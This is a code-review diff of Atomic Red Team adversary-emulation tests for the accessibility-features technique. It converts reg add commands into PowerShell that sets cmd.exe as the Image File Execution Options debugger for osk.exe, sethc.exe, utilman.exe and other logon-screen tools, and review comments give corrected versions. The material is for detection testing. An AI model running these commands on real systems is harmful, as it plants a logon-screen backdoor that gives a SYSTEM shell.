diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md
index ddc960dd..0d61b1ca 100644
--- a/atomics/T1015/T1015.md
+++ b/atomics/T1015/T1015.md
@@ -48,12 +48,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
+```
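Review bot: `-PropertyType DWORD` on the New-ItemProperty line in the IF branch is the wrong type for an IFEO Debugger value: the registry expects a REG_SZ path (which the removed `reg add ... /t REG_SZ` wrote), and New-ItemProperty will fail converting `C:\windows\system32\cmd.exe` to a DWORD, so on a host where the osk.exe IFEO key does not yet exist the test leaves an empty key and never attaches cmd.exe. Change it to `New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType String -Force`. The ELSE branch has the inverse problem — it lacks `-Force`, so a re-run against an already-present Debugger value throws instead of overwriting; add `-Force` there as well.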
@@ -69,12 +84,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
+```
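Review bot: The `$registryPath` line hardcodes `sethc.exe` even though the input-arguments table just above still declares `target_executable`, so the argument is now silently ignored and the test can no longer be pointed at a different binary (the removed command used `#{target_executable}`). Restore the placeholder: `$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}"`, and use it in the cleanup command too so cleanup removes the value that was actually set. Independently, `-PropertyType DWORD` cannot store the cmd.exe path; it should be `String` to match the REG_SZ the original reg add produced.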
@@ -90,12 +120,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
+```
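Review bot: The new cleanup command removes only the Debugger value, but the IF branch creates the entire `...\Image File Execution Options\utilman.exe` key when it is absent, so on a clean host the test leaves a stray IFEO key behind after cleanup. If a full revert is intended, delete the key when the test created it (e.g. `reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f`) rather than only the value — but not unconditionally, since the key may legitimately pre-exist with other values. Also, `-PropertyType DWORD` on the IF-branch New-ItemProperty will fail on the path string; use `String`.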
@@ -111,12 +156,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
+```
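Review bot: The ELSE branch's `New-ItemProperty -Path $registryPath -Name $name -Value $Value` has no `-Force`, so when a Debugger value already exists (a second run, or a host where the key was pre-populated) the cmdlet throws rather than overwriting — which is precisely the case that branch exists to handle. A single `Set-ItemProperty -Path $registryPath -Name $Name -Value $Value -Type String` after the key-creation check covers both create and overwrite, and also avoids the `-PropertyType DWORD` in the IF branch, which cannot hold the cmd.exe path.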
@@ -132,12 +192,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
+```
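Review bot: The IF/ELSE split duplicates the New-ItemProperty call and gets it wrong in both arms — the IF arm uses `-PropertyType DWORD` for a string path (the call fails, leaving an empty narrator.exe key), and the ELSE arm omits `-Force` so it fails when the value already exists. Ensuring the key exists first and then writing the value once, `New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType String -Force | Out-Null`, removes the branch and matches what the replaced `reg add /t REG_SZ /f` did. The hardcoded `narrator.exe` in `$registryPath` also drops the `#{target_executable}` argument the table above still advertises.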
@@ -153,12 +228,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
+```
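Review bot: `New-Item` and `New-ItemProperty` both emit the created registry objects to the pipeline, so this block dumps key and property listings into the executor's output; only the AtBroker variant later in this file pipes to `Out-Null`. Suffix both calls with `| Out-Null` for consistent, quiet output. More importantly, `-PropertyType DWORD` is incorrect for the Debugger value — a REG_SZ path is required and the conversion of `C:\windows\system32\cmd.exe` to DWORD fails — so change it to `-PropertyType String`.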
@@ -174,11 +264,26 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
-#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
-reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
+$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+$Value = "C:\windows\system32\cmd.exe"
+$Name = "Debugger"
+IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force | Out-Null
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
```
+#### Cleanup Commands:
+```
+reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
+```
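Review bot: `| Out-Null` is applied to `New-Item` here but not to the `New-ItemProperty` calls, so the atbroker variant is still noisy and differs from the other six variants in this file, which pipe nothing to `Out-Null`; pick one convention and apply it to every call. The `-PropertyType DWORD` on the IF-branch New-ItemProperty also needs to be `String` — a DWORD cannot hold the cmd.exe path, so the value is never written on a host without a pre-existing atbroker.exe IFEO key. The ELSE branch should carry `-Force` so a re-run overwrites rather than errors.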
diff --git a/atomics/index.yaml b/atomics/index.yaml
index d45fda18..c9c29c2d 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -178,11 +178,23 @@ persistence:
type: String
default: osk.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
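Review bot: The `-PropertyType DWORD` inside the new `command: |` block is the wrong type for an IFEO Debugger value: IFEO expects a REG_SZ path (the removed `reg add ... /t REG_SZ` wrote exactly that), and New-ItemProperty will fail converting `C:\windows\system32\cmd.exe` to a DWORD, so on a host without an existing osk.exe key the test creates an empty key and never attaches cmd.exe. The ELSE branch's `New-ItemProperty` has no `-Force`, so it fails when the value already exists. Collapsing both arms into one forced String write fixes both and also restores the `#{target_executable}` placeholder that this hunk drops even though the input argument is still declared above.

```yaml
      command: |
        $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}"
        $Value = "C:\windows\system32\cmd.exe"
        $Name = "Debugger"
        if (-not (Test-Path $registryPath)) {
          New-Item -Path $registryPath -Force | Out-Null
        }
        # IFEO Debugger must be REG_SZ; -Force overwrites an existing value on re-run
        New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType String -Force | Out-Null
      # … unchanged: cleanup_command …
```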
@@ -197,11 +209,23 @@ persistence:
type: String
default: sethc.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
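Review bot: The `$registryPath` line hardcodes `sethc.exe` while the `target_executable` input argument (default `sethc.exe`) is still declared just above this hunk, so the argument no longer has any effect; the removed command used `#{target_executable}`. Restore it: `$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}"`, and reference the same placeholder in `cleanup_command` so cleanup tracks the value actually set. Separately, `-PropertyType DWORD` cannot store the cmd.exe path and should be `String`.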
@@ -216,11 +240,24 @@ persistence:
type: String
default: utilman.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
@@ -235,11 +272,24 @@ persistence:
type: String
default: magnify.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
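Review bot: The ELSE arm's `New-ItemProperty -Path $registryPath -Name $name -Value $Value` lacks `-Force`, so when a Debugger value is already present (a second run of the atomic) the cmdlet throws instead of overwriting — the one case that arm exists for. Replacing both arms' property write with `Set-ItemProperty -Path $registryPath -Name $Name -Value $Value -Type String` after the key check handles create and overwrite uniformly and removes the incorrect `-PropertyType DWORD`, which cannot hold the cmd.exe path. `$Name` is assigned but `$name` is used; PowerShell is case-insensitive so it works, but using one spelling avoids the appearance of an undefined variable.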
@@ -254,11 +304,24 @@ persistence:
type: String
default: narrator.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
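Review bot: The IF arm of the new `command` writes the Debugger value with `-PropertyType DWORD`, which fails for the string path `C:\windows\system32\cmd.exe` and leaves an empty narrator.exe IFEO key with no Debugger value, so the technique never fires on a host that did not already have the key; the removed `reg add` used `REG_SZ`. Change it to `New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType String -Force`. The `IF`/`ELSE` keywords in uppercase are legal but unconventional for PowerShell; lowercase `if`/`else` matches how the rest of this repository's PowerShell reads.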
@@ -273,11 +336,24 @@ persistence:
type: String
default: DisplaySwitch.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
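Review bot: `New-Item` and `New-ItemProperty` both emit their created registry objects, so this `command` prints key and property listings into the executor output; the AtBroker variant further down this file pipes `New-Item` to `Out-Null`, so the seven variants are inconsistent with each other. Suffix each call with `| Out-Null`. More importantly, `-PropertyType DWORD` on the IF-arm New-ItemProperty must be `String`: a DWORD cannot hold the cmd.exe path, so the write fails on a host without an existing DisplaySwitch.exe key.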
@@ -292,11 +368,24 @@ persistence:
type: String
default: atbroker.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force | Out-Null
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
+ /f
'
T1098:
@@ -12754,11 +12843,23 @@ privilege-escalation:
type: String
default: osk.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
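Review bot: This privilege-escalation copy of the osk.exe atomic carries the same `-PropertyType DWORD` as the persistence copy earlier in this file: a DWORD cannot store the `C:\windows\system32\cmd.exe` path, so on a host without an existing osk.exe IFEO key the New-ItemProperty call fails and no Debugger is attached, whereas the removed `reg add ... /t REG_SZ` worked. Change it to `-PropertyType String` and add `-Force` to the ELSE arm so an existing value is overwritten on re-run. Since the two sections appear to be duplicates of one definition, the fix should be made wherever both are generated from so they do not diverge.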
@@ -12773,11 +12874,23 @@ privilege-escalation:
type: String
default: sethc.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
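Review bot: The `target_executable` input argument declared above this hunk is no longer consumed — `$registryPath` hardcodes `sethc.exe` where the removed command used `#{target_executable}` — so callers overriding the argument get the default target silently. Use `...\Image File Execution Options\#{target_executable}"` in both `command` and `cleanup_command`, or drop the now-dead argument from the definition. The `-PropertyType DWORD` in the IF arm should also be `String`; a DWORD cannot hold the path value.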
@@ -12792,11 +12905,24 @@ privilege-escalation:
type: String
default: utilman.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
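Review bot: `cleanup_command` removes the Debugger value but never removes the `...\Image File Execution Options\utilman.exe` key that the IF arm of `command` creates on hosts where it did not exist, so the atomic does not fully revert its own changes on a clean system. Deleting the key only when the test created it (e.g. `reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f`) would restore the prior state without clobbering a key that legitimately pre-exists. The IF arm's `-PropertyType DWORD` also needs to be `String`, or the Debugger value is never written on those same clean hosts.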
@@ -12811,11 +12937,24 @@ privilege-escalation:
type: String
default: magnify.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
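Review bot: The ELSE arm's `New-ItemProperty -Path $registryPath -Name $name -Value $Value` carries no `-Force`, so a second run of this atomic — the case where the magnify.exe key already exists with a Debugger value — throws instead of updating the value. `Set-ItemProperty -Path $registryPath -Name $Name -Value $Value -Type String` after the `Test-Path`/`New-Item` step handles both arms and also replaces the incorrect `-PropertyType DWORD`, which fails on the cmd.exe path string.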
@@ -12830,11 +12969,24 @@ privilege-escalation:
type: String
default: narrator.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
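Review bot: The `-PropertyType DWORD` on the IF-arm `New-ItemProperty` is wrong for an IFEO Debugger value — the registry expects a REG_SZ path, the removed `reg add` wrote one, and converting `C:\windows\system32\cmd.exe` to a DWORD fails — so the narrator.exe variant creates an empty key and never attaches cmd.exe on a host that lacked the key. Replace it with `-PropertyType String`. The hardcoded `narrator.exe` in `$registryPath` also discards the `#{target_executable}` argument still declared above the hunk.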
@@ -12849,11 +13001,24 @@ privilege-escalation:
type: String
default: DisplaySwitch.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
+ /f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
